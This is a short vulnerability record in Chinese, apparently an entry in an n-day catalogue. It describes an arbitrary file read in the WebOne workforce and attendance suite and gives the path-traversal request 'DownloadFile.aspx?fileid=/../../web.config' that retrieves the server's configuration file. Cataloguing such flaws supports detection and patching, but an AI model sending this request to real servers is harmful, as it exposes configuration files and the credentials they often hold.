vendor = "WebOne"
name = "WebOne 劳动力与考勤管理套件 DownloadFile.aspx 任意文件读取"
type = "权限绕过"
version = "未知"
path = "/webForms/Download/DownloadFile.aspx"
detail = "/webForms/Download/DownloadFile.aspx?fileid=/../../web.config&flag=report"
fix = "缺省规则可检出，除非设备规则太烂"
date = "0703"
label = "nday"
verifier = "AdySec"
